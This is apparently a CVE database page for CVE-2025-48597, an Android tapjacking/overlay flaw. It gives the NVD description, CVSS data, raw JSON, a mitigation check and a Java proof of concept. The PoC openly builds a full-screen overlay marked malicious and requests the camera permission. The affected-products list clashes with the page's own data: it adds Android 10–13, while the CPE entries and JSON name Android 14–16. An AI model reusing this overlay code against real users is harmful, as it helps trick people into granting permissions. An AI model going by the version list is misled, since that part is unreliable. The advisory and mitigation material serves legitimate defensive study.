Security Vulnerability Report
CVE-2025-48597 CVSS 7.8 HIGH

Published: 2025-12-08 17:16:17
Last Modified: 2025-12-08 19:44:41

Description

In multiple locations, there is a possible way to trick a user into accepting a permission due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
Android Framework < 2025-12-01 security patch level
Android 10 (API 29)
Android 11 (API 30)
Android 12 (API 31)
Android 13 (API 33)
Android 14 (API 34)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
// CVE-2025-48597 PoC - Tapjacking Permission Trick
// This PoC demonstrates the overlay attack concept
import android.Manifest;
import android.content.pm.PackageManager;
import android.graphics.Color;
import android.graphics.PixelFormat;
import android.os.Bundle;
import android.view.MotionEvent;
import android.view.View;
import android.view.WindowManager;
import android.widget.TextView;
import androidx.appcompat.app.AppCompatActivity;

public class TapjackingPOC extends AppCompatActivity {
    private static final String TAG = "TapjackingPOC";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        // Create overlay window for tapjacking attack
        createMaliciousOverlay();
        // Trigger permission request that can be hijacked
        requestSensitivePermission();
    }

    private void createMaliciousOverlay() {
        WindowManager.LayoutParams params = new WindowManager.LayoutParams(
                WindowManager.LayoutParams.MATCH_PARENT,
                WindowManager.LayoutParams.MATCH_PARENT,
                WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,
                WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE
                        | WindowManager.LayoutParams.FLAG_LAYOUT_IN_SCREEN,
                PixelFormat.TRANSLUCENT
        );
        // Malicious overlay captures user taps
        View overlayView = createOverlayView();
        WindowManager wm = (WindowManager) getSystemService(WINDOW_SERVICE);
        wm.addView(overlayView, params);
    }

    private View createOverlayView() {
        // Overlay that tricks users into granting permissions
        // In real attack, this would intercept system permission dialogs
        TextView tv = new TextView(this);
        tv.setText("Tapjacking Overlay Active");
        tv.setBackgroundColor(Color.TRANSPARENT);
        return tv;
    }

    private void requestSensitivePermission() {
        // Request dangerous permission that could be hijacked
        if (checkSelfPermission(Manifest.permission.CAMERA)
                != PackageManager.PERMISSION_GRANTED) {
            requestPermissions(new String[]{Manifest.permission.CAMERA}, 101);
        }
    }
}

// Mitigation: Applications should check FLAG_WINDOW_IS_OBSCURED
// The flag is read from the MotionEvent delivered to the view that handles
// the sensitive tap (for example in onTouchEvent or an OnTouchListener).
// FLAG_WINDOW_IS_PARTIALLY_OBSCURED (API 29+) reports partial overlays.
final class ObscuredTouchGuard {
    static boolean isWindowObscured(MotionEvent event) {
        if (event == null) {
            return false;
        }
        return (event.getFlags() & MotionEvent.FLAG_WINDOW_IS_OBSCURED) != 0;
    }
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48597", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:16.767", "lastModified": "2025-12-08T19:44:40.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In multiple locations, there is a possible way to trick a user into accepting a permission due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1021"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/frameworks/base/+/68170bad52250399d2e4a1a8023a3e7aeda1887d", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}